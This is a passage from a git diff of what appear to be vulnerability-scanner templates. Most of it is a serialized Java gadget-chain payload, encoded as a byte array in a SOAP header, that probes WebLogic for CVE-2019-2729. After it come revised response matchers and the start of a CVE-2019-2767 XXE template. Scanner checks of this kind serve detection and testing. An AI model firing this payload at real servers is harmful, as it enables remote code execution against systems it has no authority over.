index="2654"><byte>74</byte></void><void index="2655"><byte>1</byte></void><void index="2656"><byte>0</byte></void><void index="2657"><byte>13</byte></void><void index="2658"><byte>67</byte></void><void index="2659"><byte>111</byte></void><void index="2660"><byte>110</byte></void><void index="2661"><byte>115</byte></void><void index="2662"><byte>116</byte></void><void index="2663"><byte>97</byte></void><void index="2664"><byte>110</byte></void><void index="2665"><byte>116</byte></void><void index="2666"><byte>86</byte></void><void index="2667"><byte>97</byte></void><void index="2668"><byte>108</byte></void><void index="2669"><byte>117</byte></void><void index="2670"><byte>101</byte></void><void index="2671"><byte>5</byte></void><void index="2672"><byte>113</byte></void><void index="2673"><byte>-26</byte></void><void index="2674"><byte>105</byte></void><void index="2675"><byte>-18</byte></void><void index="2676"><byte>60</byte></void><void index="2677"><byte>109</byte></void><void index="2678"><byte>71</byte></void><void index="2679"><byte>24</byte></void><void index="2680"><byte>1</byte></void><void index="2681"><byte>0</byte></void><void index="2682"><byte>6</byte></void><void index="2683"><byte>60</byte></void><void index="2684"><byte>105</byte></void><void index="2685"><byte>110</byte></void><void index="2686"><byte>105</byte></void><void index="2687"><byte>116</byte></void><void index="2688"><byte>62</byte></void><void index="2689"><byte>1</byte></void><void index="2690"><byte>0</byte></void><void index="2691"><byte>3</byte></void><void index="2692"><byte>40</byte></void><void index="2693"><byte>41</byte></void><void index="2694"><byte>86</byte></void><void index="2695"><byte>1</byte></void><void index="2696"><byte>0</byte></void><void index="2697"><byte>4</byte></void><void index="2698"><byte>67</byte></void><void index="2699"><byte>111</byte></void><void index="2700"><byte>100</byte></void><void index="2701"><byte>101</byte></void><void index="2702"><byte>1</byte></void><void index="2703"><byte>0</byte></void><void index="2704"><byte>15</byte></void><void index="2705"><byte>76</byte></void><void index="2706"><byte>105</byte></void><void index="2707"><byte>110</byte></void><void index="2708"><byte>101</byte></void><void index="2709"><byte>78</byte></void><void index="2710"><byte>117</byte></void><void index="2711"><byte>109</byte></void><void index="2712"><byte>98</byte></void><void index="2713"><byte>101</byte></void><void index="2714"><byte>114</byte></void><void index="2715"><byte>84</byte></void><void index="2716"><byte>97</byte></void><void index="2717"><byte>98</byte></void><void index="2718"><byte>108</byte></void><void index="2719"><byte>101</byte></void><void index="2720"><byte>1</byte></void><void index="2721"><byte>0</byte></void><void index="2722"><byte>18</byte></void><void index="2723"><byte>76</byte></void><void index="2724"><byte>111</byte></void><void index="2725"><byte>99</byte></void><void index="2726"><byte>97</byte></void><void index="2727"><byte>108</byte></void><void index="2728"><byte>86</byte></void><void index="2729"><byte>97</byte></void><void index="2730"><byte>114</byte></void><void index="2731"><byte>105</byte></void><void index="2732"><byte>97</byte></void><void index="2733"><byte>98</byte></void><void index="2734"><byte>108</byte></void><void index="2735"><byte>101</byte></void><void index="2736"><byte>84</byte></void><void index="2737"><byte>97</byte></void><void index="2738"><byte>98</byte></void><void index="2739"><byte>108</byte></void><void index="2740"><byte>101</byte></void><void index="2741"><byte>1</byte></void><void index="2742"><byte>0</byte></void><void index="2743"><byte>4</byte></void><void index="2744"><byte>116</byte></void><void index="2745"><byte>104</byte></void><void index="2746"><byte>105</byte></void><void index="2747"><byte>115</byte></void><void index="2748"><byte>1</byte></void><void index="2749"><byte>0</byte></void><void index="2750"><byte>3</byte></void><void index="2751"><byte>70</byte></void><void index="2752"><byte>111</byte></void><void index="2753"><byte>111</byte></void><void index="2754"><byte>1</byte></void><void index="2755"><byte>0</byte></void><void index="2756"><byte>12</byte></void><void index="2757"><byte>73</byte></void><void index="2758"><byte>110</byte></void><void index="2759"><byte>110</byte></void><void index="2760"><byte>101</byte></void><void index="2761"><byte>114</byte></void><void index="2762"><byte>67</byte></void><void index="2763"><byte>108</byte></void><void index="2764"><byte>97</byte></void><void index="2765"><byte>115</byte></void><void index="2766"><byte>115</byte></void><void index="2767"><byte>101</byte></void><void index="2768"><byte>115</byte></void><void index="2769"><byte>1</byte></void><void index="2770"><byte>0</byte></void><void index="2771"><byte>37</byte></void><void index="2772"><byte>76</byte></void><void index="2773"><byte>121</byte></void><void index="2774"><byte>115</byte></void><void index="2775"><byte>111</byte></void><void index="2776"><byte>115</byte></void><void index="2777"><byte>101</byte></void><void index="2778"><byte>114</byte></void><void index="2779"><byte>105</byte></void><void index="2780"><byte>97</byte></void><void index="2781"><byte>108</byte></void><void index="2782"><byte>47</byte></void><void index="2783"><byte>112</byte></void><void index="2784"><byte>97</byte></void><void index="2785"><byte>121</byte></void><void index="2786"><byte>108</byte></void><void index="2787"><byte>111</byte></void><void index="2788"><byte>97</byte></void><void index="2789"><byte>100</byte></void><void index="2790"><byte>115</byte></void><void index="2791"><byte>47</byte></void><void index="2792"><byte>117</byte></void><void index="2793"><byte>116</byte></void><void index="2794"><byte>105</byte></void><void index="2795"><byte>108</byte></void><void index="2796"><byte>47</byte></void><void index="2797"><byte>71</byte></void><void index="2798"><byte>97</byte></void><void index="2799"><byte>100</byte></void><void index="2800"><byte>103</byte></void><void index="2801"><byte>101</byte></void><void index="2802"><byte>116</byte></void><void index="2803"><byte>115</byte></void><void index="2804"><byte>36</byte></void><void index="2805"><byte>70</byte></void><void index="2806"><byte>111</byte></void><void index="2807"><byte>111</byte></void><void index="2808"><byte>59</byte></void><void index="2809"><byte>1</byte></void><void index="2810"><byte>0</byte></void><void index="2811"><byte>10</byte></void><void index="2812"><byte>83</byte></void><void index="2813"><byte>111</byte></void><void index="2814"><byte>117</byte></void><void index="2815"><byte>114</byte></void><void index="2816"><byte>99</byte></void><void index="2817"><byte>101</byte></void><void index="2818"><byte>70</byte></void><void index="2819"><byte>105</byte></void><void index="2820"><byte>108</byte></void><void index="2821"><byte>101</byte></void><void index="2822"><byte>1</byte></void><void index="2823"><byte>0</byte></void><void index="2824"><byte>12</byte></void><void index="2825"><byte>71</byte></void><void index="2826"><byte>97</byte></void><void index="2827"><byte>100</byte></void><void index="2828"><byte>103</byte></void><void index="2829"><byte>101</byte></void><void index="2830"><byte>116</byte></void><void index="2831"><byte>115</byte></void><void index="2832"><byte>46</byte></void><void index="2833"><byte>106</byte></void><void index="2834"><byte>97</byte></void><void index="2835"><byte>118</byte></void><void index="2836"><byte>97</byte></void><void index="2837"><byte>12</byte></void><void index="2838"><byte>0</byte></void><void index="2839"><byte>10</byte></void><void index="2840"><byte>0</byte></void><void index="2841"><byte>11</byte></void><void index="2842"><byte>7</byte></void><void index="2843"><byte>0</byte></void><void index="2844"><byte>26</byte></void><void index="2845"><byte>1</byte></void><void index="2846"><byte>0</byte></void><void index="2847"><byte>35</byte></void><void index="2848"><byte>121</byte></void><void index="2849"><byte>115</byte></void><void index="2850"><byte>111</byte></void><void index="2851"><byte>115</byte></void><void index="2852"><byte>101</byte></void><void index="2853"><byte>114</byte></void><void index="2854"><byte>105</byte></void><void index="2855"><byte>97</byte></void><void index="2856"><byte>108</byte></void><void index="2857"><byte>47</byte></void><void index="2858"><byte>112</byte></void><void index="2859"><byte>97</byte></void><void index="2860"><byte>121</byte></void><void index="2861"><byte>108</byte></void><void index="2862"><byte>111</byte></void><void index="2863"><byte>97</byte></void><void index="2864"><byte>100</byte></void><void index="2865"><byte>115</byte></void><void index="2866"><byte>47</byte></void><void index="2867"><byte>117</byte></void><void index="2868"><byte>116</byte></void><void index="2869"><byte>105</byte></void><void index="2870"><byte>108</byte></void><void index="2871"><byte>47</byte></void><void index="2872"><byte>71</byte></void><void index="2873"><byte>97</byte></void><void index="2874"><byte>100</byte></void><void index="2875"><byte>103</byte></void><void index="2876"><byte>101</byte></void><void index="2877"><byte>116</byte></void><void index="2878"><byte>115</byte></void><void index="2879"><byte>36</byte></void><void index="2880"><byte>70</byte></void><void index="2881"><byte>111</byte></void><void index="2882"><byte>111</byte></void><void index="2883"><byte>1</byte></void><void index="2884"><byte>0</byte></void><void index="2885"><byte>16</byte></void><void index="2886"><byte>106</byte></void><void index="2887"><byte>97</byte></void><void index="2888"><byte>118</byte></void><void index="2889"><byte>97</byte></void><void index="2890"><byte>47</byte></void><void index="2891"><byte>108</byte></void><void index="2892"><byte>97</byte></void><void index="2893"><byte>110</byte></void><void index="2894"><byte>103</byte></void><void index="2895"><byte>47</byte></void><void index="2896"><byte>79</byte></void><void index="2897"><byte>98</byte></void><void index="2898"><byte>106</byte></void><void index="2899"><byte>101</byte></void><void index="2900"><byte>99</byte></void><void index="2901"><byte>116</byte></void><void index="2902"><byte>1</byte></void><void index="2903"><byte>0</byte></void><void index="2904"><byte>20</byte></void><void index="2905"><byte>106</byte></void><void index="2906"><byte>97</byte></void><void index="2907"><byte>118</byte></void><void index="2908"><byte>97</byte></void><void index="2909"><byte>47</byte></void><void index="2910"><byte>105</byte></void><void index="2911"><byte>111</byte></void><void index="2912"><byte>47</byte></void><void index="2913"><byte>83</byte></void><void index="2914"><byte>101</byte></void><void index="2915"><byte>114</byte></void><void index="2916"><byte>105</byte></void><void index="2917"><byte>97</byte></void><void index="2918"><byte>108</byte></void><void index="2919"><byte>105</byte></void><void index="2920"><byte>122</byte></void><void index="2921"><byte>97</byte></void><void index="2922"><byte>98</byte></void><void index="2923"><byte>108</byte></void><void index="2924"><byte>101</byte></void><void index="2925"><byte>1</byte></void><void index="2926"><byte>0</byte></void><void index="2927"><byte>31</byte></void><void index="2928"><byte>121</byte></void><void index="2929"><byte>115</byte></void><void index="2930"><byte>111</byte></void><void index="2931"><byte>115</byte></void><void index="2932"><byte>101</byte></void><void index="2933"><byte>114</byte></void><void index="2934"><byte>105</byte></void><void index="2935"><byte>97</byte></void><void index="2936"><byte>108</byte></void><void index="2937"><byte>47</byte></void><void index="2938"><byte>112</byte></void><void index="2939"><byte>97</byte></void><void index="2940"><byte>121</byte></void><void index="2941"><byte>108</byte></void><void index="2942"><byte>111</byte></void><void index="2943"><byte>97</byte></void><void index="2944"><byte>100</byte></void><void index="2945"><byte>115</byte></void><void index="2946"><byte>47</byte></void><void index="2947"><byte>117</byte></void><void index="2948"><byte>116</byte></void><void index="2949"><byte>105</byte></void><void index="2950"><byte>108</byte></void><void index="2951"><byte>47</byte></void><void index="2952"><byte>71</byte></void><void index="2953"><byte>97</byte></void><void index="2954"><byte>100</byte></void><void index="2955"><byte>103</byte></void><void index="2956"><byte>101</byte></void><void index="2957"><byte>116</byte></void><void index="2958"><byte>115</byte></void><void index="2959"><byte>0</byte></void><void index="2960"><byte>33</byte></void><void index="2961"><byte>0</byte></void><void index="2962"><byte>2</byte></void><void index="2963"><byte>0</byte></void><void index="2964"><byte>3</byte></void><void index="2965"><byte>0</byte></void><void index="2966"><byte>1</byte></void><void index="2967"><byte>0</byte></void><void index="2968"><byte>4</byte></void><void index="2969"><byte>0</byte></void><void index="2970"><byte>1</byte></void><void index="2971"><byte>0</byte></void><void index="2972"><byte>26</byte></void><void index="2973"><byte>0</byte></void><void index="2974"><byte>5</byte></void><void index="2975"><byte>0</byte></void><void index="2976"><byte>6</byte></void><void index="2977"><byte>0</byte></void><void index="2978"><byte>1</byte></void><void index="2979"><byte>0</byte></void><void index="2980"><byte>7</byte></void><void index="2981"><byte>0</byte></void><void index="2982"><byte>0</byte></void><void index="2983"><byte>0</byte></void><void index="2984"><byte>2</byte></void><void index="2985"><byte>0</byte></void><void index="2986"><byte>8</byte></void><void index="2987"><byte>0</byte></void><void index="2988"><byte>1</byte></void><void index="2989"><byte>0</byte></void><void index="2990"><byte>1</byte></void><void index="2991"><byte>0</byte></void><void index="2992"><byte>10</byte></void><void index="2993"><byte>0</byte></void><void index="2994"><byte>11</byte></void><void index="2995"><byte>0</byte></void><void index="2996"><byte>1</byte></void><void index="2997"><byte>0</byte></void><void index="2998"><byte>12</byte></void><void index="2999"><byte>0</byte></void><void index="3000"><byte>0</byte></void><void index="3001"><byte>0</byte></void><void index="3002"><byte>47</byte></void><void index="3003"><byte>0</byte></void><void index="3004"><byte>1</byte></void><void index="3005"><byte>0</byte></void><void index="3006"><byte>1</byte></void><void index="3007"><byte>0</byte></void><void index="3008"><byte>0</byte></void><void index="3009"><byte>0</byte></void><void index="3010"><byte>5</byte></void><void index="3011"><byte>42</byte></void><void index="3012"><byte>-73</byte></void><void index="3013"><byte>0</byte></void><void index="3014"><byte>1</byte></void><void index="3015"><byte>-79</byte></void><void index="3016"><byte>0</byte></void><void index="3017"><byte>0</byte></void><void index="3018"><byte>0</byte></void><void index="3019"><byte>2</byte></void><void index="3020"><byte>0</byte></void><void index="3021"><byte>13</byte></void><void index="3022"><byte>0</byte></void><void index="3023"><byte>0</byte></void><void index="3024"><byte>0</byte></void><void index="3025"><byte>6</byte></void><void index="3026"><byte>0</byte></void><void index="3027"><byte>1</byte></void><void index="3028"><byte>0</byte></void><void index="3029"><byte>0</byte></void><void index="3030"><byte>0</byte></void><void index="3031"><byte>54</byte></void><void index="3032"><byte>0</byte></void><void index="3033"><byte>14</byte></void><void index="3034"><byte>0</byte></void><void index="3035"><byte>0</byte></void><void index="3036"><byte>0</byte></void><void index="3037"><byte>12</byte></void><void index="3038"><byte>0</byte></void><void index="3039"><byte>1</byte></void><void index="3040"><byte>0</byte></void><void index="3041"><byte>0</byte></void><void index="3042"><byte>0</byte></void><void index="3043"><byte>5</byte></void><void index="3044"><byte>0</byte></void><void index="3045"><byte>15</byte></void><void index="3046"><byte>0</byte></void><void index="3047"><byte>18</byte></void><void index="3048"><byte>0</byte></void><void index="3049"><byte>0</byte></void><void index="3050"><byte>0</byte></void><void index="3051"><byte>2</byte></void><void index="3052"><byte>0</byte></void><void index="3053"><byte>19</byte></void><void index="3054"><byte>0</byte></void><void index="3055"><byte>0</byte></void><void index="3056"><byte>0</byte></void><void index="3057"><byte>2</byte></void><void index="3058"><byte>0</byte></void><void index="3059"><byte>20</byte></void><void index="3060"><byte>0</byte></void><void index="3061"><byte>17</byte></void><void index="3062"><byte>0</byte></void><void index="3063"><byte>0</byte></void><void index="3064"><byte>0</byte></void><void index="3065"><byte>10</byte></void><void index="3066"><byte>0</byte></void><void index="3067"><byte>1</byte></void><void index="3068"><byte>0</byte></void><void index="3069"><byte>2</byte></void><void index="3070"><byte>0</byte></void><void index="3071"><byte>22</byte></void><void index="3072"><byte>0</byte></void><void index="3073"><byte>16</byte></void><void index="3074"><byte>0</byte></void><void index="3075"><byte>9</byte></void><void index="3076"><byte>112</byte></void><void index="3077"><byte>116</byte></void><void index="3078"><byte>0</byte></void><void index="3079"><byte>4</byte></void><void index="3080"><byte>80</byte></void><void index="3081"><byte>119</byte></void><void index="3082"><byte>110</byte></void><void index="3083"><byte>114</byte></void><void index="3084"><byte>112</byte></void><void index="3085"><byte>119</byte></void><void index="3086"><byte>1</byte></void><void index="3087"><byte>0</byte></void><void index="3088"><byte>120</byte></void><void index="3089"><byte>115</byte></void><void index="3090"><byte>125</byte></void><void index="3091"><byte>0</byte></void><void index="3092"><byte>0</byte></void><void index="3093"><byte>0</byte></void><void index="3094"><byte>1</byte></void><void index="3095"><byte>0</byte></void><void index="3096"><byte>29</byte></void><void index="3097"><byte>106</byte></void><void index="3098"><byte>97</byte></void><void index="3099"><byte>118</byte></void><void index="3100"><byte>97</byte></void><void index="3101"><byte>120</byte></void><void index="3102"><byte>46</byte></void><void index="3103"><byte>120</byte></void><void index="3104"><byte>109</byte></void><void index="3105"><byte>108</byte></void><void index="3106"><byte>46</byte></void><void index="3107"><byte>116</byte></void><void index="3108"><byte>114</byte></void><void index="3109"><byte>97</byte></void><void index="3110"><byte>110</byte></void><void index="3111"><byte>115</byte></void><void index="3112"><byte>102</byte></void><void index="3113"><byte>111</byte></void><void index="3114"><byte>114</byte></void><void index="3115"><byte>109</byte></void><void index="3116"><byte>46</byte></void><void index="3117"><byte>84</byte></void><void index="3118"><byte>101</byte></void><void index="3119"><byte>109</byte></void><void index="3120"><byte>112</byte></void><void index="3121"><byte>108</byte></void><void index="3122"><byte>97</byte></void><void index="3123"><byte>116</byte></void><void index="3124"><byte>101</byte></void><void index="3125"><byte>115</byte></void><void index="3126"><byte>120</byte></void><void index="3127"><byte>114</byte></void><void index="3128"><byte>0</byte></void><void index="3129"><byte>23</byte></void><void index="3130"><byte>106</byte></void><void index="3131"><byte>97</byte></void><void index="3132"><byte>118</byte></void><void index="3133"><byte>97</byte></void><void index="3134"><byte>46</byte></void><void index="3135"><byte>108</byte></void><void index="3136"><byte>97</byte></void><void index="3137"><byte>110</byte></void><void index="3138"><byte>103</byte></void><void index="3139"><byte>46</byte></void><void index="3140"><byte>114</byte></void><void index="3141"><byte>101</byte></void><void index="3142"><byte>102</byte></void><void index="3143"><byte>108</byte></void><void index="3144"><byte>101</byte></void><void index="3145"><byte>99</byte></void><void index="3146"><byte>116</byte></void><void index="3147"><byte>46</byte></void><void index="3148"><byte>80</byte></void><void index="3149"><byte>114</byte></void><void index="3150"><byte>111</byte></void><void index="3151"><byte>120</byte></void><void index="3152"><byte>121</byte></void><void index="3153"><byte>-31</byte></void><void index="3154"><byte>39</byte></void><void index="3155"><byte>-38</byte></void><void index="3156"><byte>32</byte></void><void index="3157"><byte>-52</byte></void><void index="3158"><byte>16</byte></void><void index="3159"><byte>67</byte></void><void index="3160"><byte>-53</byte></void><void index="3161"><byte>2</byte></void><void index="3162"><byte>0</byte></void><void index="3163"><byte>1</byte></void><void index="3164"><byte>76</byte></void><void index="3165"><byte>0</byte></void><void index="3166"><byte>1</byte></void><void index="3167"><byte>104</byte></void><void index="3168"><byte>116</byte></void><void index="3169"><byte>0</byte></void><void index="3170"><byte>37</byte></void><void index="3171"><byte>76</byte></void><void index="3172"><byte>106</byte></void><void index="3173"><byte>97</byte></void><void index="3174"><byte>118</byte></void><void index="3175"><byte>97</byte></void><void index="3176"><byte>47</byte></void><void index="3177"><byte>108</byte></void><void index="3178"><byte>97</byte></void><void index="3179"><byte>110</byte></void><void index="3180"><byte>103</byte></void><void index="3181"><byte>47</byte></void><void index="3182"><byte>114</byte></void><void index="3183"><byte>101</byte></void><void index="3184"><byte>102</byte></void><void index="3185"><byte>108</byte></void><void index="3186"><byte>101</byte></void><void index="3187"><byte>99</byte></void><void index="3188"><byte>116</byte></void><void index="3189"><byte>47</byte></void><void index="3190"><byte>73</byte></void><void index="3191"><byte>110</byte></void><void index="3192"><byte>118</byte></void><void index="3193"><byte>111</byte></void><void index="3194"><byte>99</byte></void><void index="3195"><byte>97</byte></void><void index="3196"><byte>116</byte></void><void index="3197"><byte>105</byte></void><void index="3198"><byte>111</byte></void><void index="3199"><byte>110</byte></void><void index="3200"><byte>72</byte></void><void index="3201"><byte>97</byte></void><void index="3202"><byte>110</byte></void><void index="3203"><byte>100</byte></void><void index="3204"><byte>108</byte></void><void index="3205"><byte>101</byte></void><void index="3206"><byte>114</byte></void><void index="3207"><byte>59</byte></void><void index="3208"><byte>120</byte></void><void index="3209"><byte>112</byte></void><void index="3210"><byte>115</byte></void><void index="3211"><byte>114</byte></void><void index="3212"><byte>0</byte></void><void index="3213"><byte>50</byte></void><void index="3214"><byte>115</byte></void><void index="3215"><byte>117</byte></void><void index="3216"><byte>110</byte></void><void index="3217"><byte>46</byte></void><void index="3218"><byte>114</byte></void><void index="3219"><byte>101</byte></void><void index="3220"><byte>102</byte></void><void index="3221"><byte>108</byte></void><void index="3222"><byte>101</byte></void><void index="3223"><byte>99</byte></void><void index="3224"><byte>116</byte></void><void index="3225"><byte>46</byte></void><void index="3226"><byte>97</byte></void><void index="3227"><byte>110</byte></void><void index="3228"><byte>110</byte></void><void index="3229"><byte>111</byte></void><void index="3230"><byte>116</byte></void><void index="3231"><byte>97</byte></void><void index="3232"><byte>116</byte></void><void index="3233"><byte>105</byte></void><void index="3234"><byte>111</byte></void><void index="3235"><byte>110</byte></void><void index="3236"><byte>46</byte></void><void index="3237"><byte>65</byte></void><void index="3238"><byte>110</byte></void><void index="3239"><byte>110</byte></void><void index="3240"><byte>111</byte></void><void index="3241"><byte>116</byte></void><void index="3242"><byte>97</byte></void><void index="3243"><byte>116</byte></void><void index="3244"><byte>105</byte></void><void index="3245"><byte>111</byte></void><void index="3246"><byte>110</byte></void><void index="3247"><byte>73</byte></void><void index="3248"><byte>110</byte></void><void index="3249"><byte>118</byte></void><void index="3250"><byte>111</byte></void><void index="3251"><byte>99</byte></void><void index="3252"><byte>97</byte></void><void index="3253"><byte>116</byte></void><void index="3254"><byte>105</byte></void><void index="3255"><byte>111</byte></void><void index="3256"><byte>110</byte></void><void index="3257"><byte>72</byte></void><void index="3258"><byte>97</byte></void><void index="3259"><byte>110</byte></void><void index="3260"><byte>100</byte></void><void index="3261"><byte>108</byte></void><void index="3262"><byte>101</byte></void><void index="3263"><byte>114</byte></void><void index="3264"><byte>85</byte></void><void index="3265"><byte>-54</byte></void><void index="3266"><byte>-11</byte></void><void index="3267"><byte>15</byte></void><void index="3268"><byte>21</byte></void><void index="3269"><byte>-53</byte></void><void index="3270"><byte>126</byte></void><void index="3271"><byte>-91</byte></void><void index="3272"><byte>2</byte></void><void index="3273"><byte>0</byte></void><void index="3274"><byte>2</byte></void><void index="3275"><byte>76</byte></void><void index="3276"><byte>0</byte></void><void index="3277"><byte>12</byte></void><void index="3278"><byte>109</byte></void><void index="3279"><byte>101</byte></void><void index="3280"><byte>109</byte></void><void index="3281"><byte>98</byte></void><void index="3282"><byte>101</byte></void><void index="3283"><byte>114</byte></void><void index="3284"><byte>86</byte></void><void index="3285"><byte>97</byte></void><void index="3286"><byte>108</byte></void><void index="3287"><byte>117</byte></void><void index="3288"><byte>101</byte></void><void index="3289"><byte>115</byte></void><void index="3290"><byte>116</byte></void><void index="3291"><byte>0</byte></void><void index="3292"><byte>15</byte></void><void index="3293"><byte>76</byte></void><void index="3294"><byte>106</byte></void><void index="3295"><byte>97</byte></void><void index="3296"><byte>118</byte></void><void index="3297"><byte>97</byte></void><void index="3298"><byte>47</byte></void><void index="3299"><byte>117</byte></void><void index="3300"><byte>116</byte></void><void index="3301"><byte>105</byte></void><void index="3302"><byte>108</byte></void><void index="3303"><byte>47</byte></void><void index="3304"><byte>77</byte></void><void index="3305"><byte>97</byte></void><void index="3306"><byte>112</byte></void><void index="3307"><byte>59</byte></void><void index="3308"><byte>76</byte></void><void index="3309"><byte>0</byte></void><void index="3310"><byte>4</byte></void><void index="3311"><byte>116</byte></void><void index="3312"><byte>121</byte></void><void index="3313"><byte>112</byte></void><void index="3314"><byte>101</byte></void><void index="3315"><byte>116</byte></void><void index="3316"><byte>0</byte></void><void index="3317"><byte>17</byte></void><void index="3318"><byte>76</byte></void><void index="3319"><byte>106</byte></void><void index="3320"><byte>97</byte></void><void index="3321"><byte>118</byte></void><void index="3322"><byte>97</byte></void><void index="3323"><byte>47</byte></void><void index="3324"><byte>108</byte></void><void index="3325"><byte>97</byte></void><void index="3326"><byte>110</byte></void><void index="3327"><byte>103</byte></void><void index="3328"><byte>47</byte></void><void index="3329"><byte>67</byte></void><void index="3330"><byte>108</byte></void><void index="3331"><byte>97</byte></void><void index="3332"><byte>115</byte></void><void index="3333"><byte>115</byte></void><void index="3334"><byte>59</byte></void><void index="3335"><byte>120</byte></void><void index="3336"><byte>112</byte></void><void index="3337"><byte>115</byte></void><void index="3338"><byte>114</byte></void><void index="3339"><byte>0</byte></void><void index="3340"><byte>17</byte></void><void index="3341"><byte>106</byte></void><void index="3342"><byte>97</byte></void><void index="3343"><byte>118</byte></void><void index="3344"><byte>97</byte></void><void index="3345"><byte>46</byte></void><void index="3346"><byte>117</byte></void><void index="3347"><byte>116</byte></void><void index="3348"><byte>105</byte></void><void index="3349"><byte>108</byte></void><void index="3350"><byte>46</byte></void><void index="3351"><byte>72</byte></void><void index="3352"><byte>97</byte></void><void index="3353"><byte>115</byte></void><void index="3354"><byte>104</byte></void><void index="3355"><byte>77</byte></void><void index="3356"><byte>97</byte></void><void index="3357"><byte>112</byte></void><void index="3358"><byte>5</byte></void><void index="3359"><byte>7</byte></void><void index="3360"><byte>-38</byte></void><void index="3361"><byte>-63</byte></void><void index="3362"><byte>-61</byte></void><void index="3363"><byte>22</byte></void><void index="3364"><byte>96</byte></void><void index="3365"><byte>-47</byte></void><void index="3366"><byte>3</byte></void><void index="3367"><byte>0</byte></void><void index="3368"><byte>2</byte></void><void index="3369"><byte>70</byte></void><void index="3370"><byte>0</byte></void><void index="3371"><byte>10</byte></void><void index="3372"><byte>108</byte></void><void index="3373"><byte>111</byte></void><void index="3374"><byte>97</byte></void><void index="3375"><byte>100</byte></void><void index="3376"><byte>70</byte></void><void index="3377"><byte>97</byte></void><void index="3378"><byte>99</byte></void><void index="3379"><byte>116</byte></void><void index="3380"><byte>111</byte></void><void index="3381"><byte>114</byte></void><void index="3382"><byte>73</byte></void><void index="3383"><byte>0</byte></void><void index="3384"><byte>9</byte></void><void index="3385"><byte>116</byte></void><void index="3386"><byte>104</byte></void><void index="3387"><byte>114</byte></void><void index="3388"><byte>101</byte></void><void index="3389"><byte>115</byte></void><void index="3390"><byte>104</byte></void><void index="3391"><byte>111</byte></void><void index="3392"><byte>108</byte></void><void index="3393"><byte>100</byte></void><void index="3394"><byte>120</byte></void><void index="3395"><byte>112</byte></void><void index="3396"><byte>63</byte></void><void index="3397"><byte>64</byte></void><void index="3398"><byte>0</byte></void><void index="3399"><byte>0</byte></void><void index="3400"><byte>0</byte></void><void index="3401"><byte>0</byte></void><void index="3402"><byte>0</byte></void><void index="3403"><byte>12</byte></void><void index="3404"><byte>119</byte></void><void index="3405"><byte>8</byte></void><void index="3406"><byte>0</byte></void><void index="3407"><byte>0</byte></void><void index="3408"><byte>0</byte></void><void index="3409"><byte>16</byte></void><void index="3410"><byte>0</byte></void><void index="3411"><byte>0</byte></void><void index="3412"><byte>0</byte></void><void index="3413"><byte>1</byte></void><void index="3414"><byte>116</byte></void><void index="3415"><byte>0</byte></void><void index="3416"><byte>8</byte></void><void index="3417"><byte>102</byte></void><void index="3418"><byte>53</byte></void><void index="3419"><byte>97</byte></void><void index="3420"><byte>53</byte></void><void index="3421"><byte>97</byte></void><void index="3422"><byte>54</byte></void><void index="3423"><byte>48</byte></void><void index="3424"><byte>56</byte></void><void index="3425"><byte>113</byte></void><void index="3426"><byte>0</byte></void><void index="3427"><byte>126</byte></void><void index="3428"><byte>0</byte></void><void index="3429"><byte>8</byte></void><void index="3430"><byte>120</byte></void><void index="3431"><byte>118</byte></void><void index="3432"><byte>114</byte></void><void index="3433"><byte>0</byte></void><void index="3434"><byte>29</byte></void><void index="3435"><byte>106</byte></void><void index="3436"><byte>97</byte></void><void index="3437"><byte>118</byte></void><void index="3438"><byte>97</byte></void><void index="3439"><byte>120</byte></void><void index="3440"><byte>46</byte></void><void index="3441"><byte>120</byte></void><void index="3442"><byte>109</byte></void><void index="3443"><byte>108</byte></void><void index="3444"><byte>46</byte></void><void index="3445"><byte>116</byte></void><void index="3446"><byte>114</byte></void><void index="3447"><byte>97</byte></void><void index="3448"><byte>110</byte></void><void index="3449"><byte>115</byte></void><void index="3450"><byte>102</byte></void><void index="3451"><byte>111</byte></void><void index="3452"><byte>114</byte></void><void index="3453"><byte>109</byte></void><void index="3454"><byte>46</byte></void><void index="3455"><byte>84</byte></void><void index="3456"><byte>101</byte></void><void index="3457"><byte>109</byte></void><void index="3458"><byte>112</byte></void><void index="3459"><byte>108</byte></void><void index="3460"><byte>97</byte></void><void index="3461"><byte>116</byte></void><void index="3462"><byte>101</byte></void><void index="3463"><byte>115</byte></void><void index="3464"><byte>0</byte></void><void index="3465"><byte>0</byte></void><void index="3466"><byte>0</byte></void><void index="3467"><byte>0</byte></void><void index="3468"><byte>0</byte></void><void index="3469"><byte>0</byte></void><void index="3470"><byte>0</byte></void><void index="3471"><byte>0</byte></void><void index="3472"><byte>0</byte></void><void index="3473"><byte>0</byte></void><void index="3474"><byte>0</byte></void><void index="3475"><byte>120</byte></void><void index="3476"><byte>112</byte></void><void index="3477"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
+
+      - |
+        GET /_async/favicon.ico HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    req-condition: true
+    matchers-condition: or
     matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200'
+          - 'contains(body_1, "CVE-2019-2729-POC")'
+        condition: and
 
-      - type: word
-        words:
-          - "CVE-2019-2729-POC"
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 202'
+          - 'contains(body_3, "Vulnerable")'
+        condition: and
 
 # Enhanced by mp on 2022/04/14
diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml
index bf0fc7b5e9..0d3b97de43 100644
--- a/cves/2019/CVE-2019-2767.yaml
+++ b/cves/2019/CVE-2019-2767.yaml
@@ -1,19 +1,19 @@
 id: CVE-2019-2767
 
 info:
-  name: Oracle Business Intelligence - Publisher XXE
+  name: Oracle Business Intelligence Publisher - XML External Entity Injection
   author: madrobot
   severity: high
-  description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily
-    exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher.
+  description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
     - https://www.exploit-db.com/exploits/46729
+    - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
   classification:
